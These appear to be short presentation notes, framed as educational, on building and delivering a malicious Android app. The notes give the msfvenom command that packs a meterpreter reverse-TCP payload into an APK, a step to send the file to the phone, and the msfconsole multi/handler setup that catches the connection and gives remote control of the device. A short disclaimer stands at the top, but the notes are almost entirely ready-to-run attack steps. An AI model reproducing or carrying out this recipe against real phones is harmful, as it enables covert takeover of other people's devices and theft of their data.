Create and deploy and gain access to a vulnerable android device. ****************************************************** The information in this presentation is intended for educational use only. Techniques shown should only be performed on your own network. Using these skills on a network without Prior consent is illegal. (Don't be evil) ****************************************************** msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > MUG2016.apk Send file to phone start msfconsole to accept the connection msfconsole search multi/handler use exploit/multi/handler Configure payload set PAYLOAD android/meterpreter/reverse_tcp Set Options show options set LHOST = IP set LPort = 4444 to verify settings: show options Launch exploit exploit wait for phone to connect sysinfo ?